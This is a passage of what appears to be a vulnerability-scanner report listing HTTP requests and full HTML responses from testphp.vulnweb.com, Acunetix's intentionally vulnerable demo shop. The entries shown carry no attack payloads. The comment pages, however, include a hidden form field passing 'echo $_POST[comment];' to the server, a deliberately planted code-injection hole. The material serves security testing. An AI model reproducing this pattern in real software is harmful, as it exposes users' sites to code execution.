developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:56 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: Blad3</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=2'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=2','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/artists.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6193 |
Response Body - size: 6,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>artists</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>artist: lyzae</h2><div class='story'><p><p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></p><p><a href='listproducts.php?artist=3'>view pictures of the artist</a></p><p><a href='#' onClick="window.open('./comment.php?aid=3','comment','width=500,height=400')">comment on this artist</a></p></div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 259 bytes. |
GET http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/categories.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6115 |
Response Body - size: 6,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture categories</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">categories</h2> <div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/comment.php?aid=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/disclaimer.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
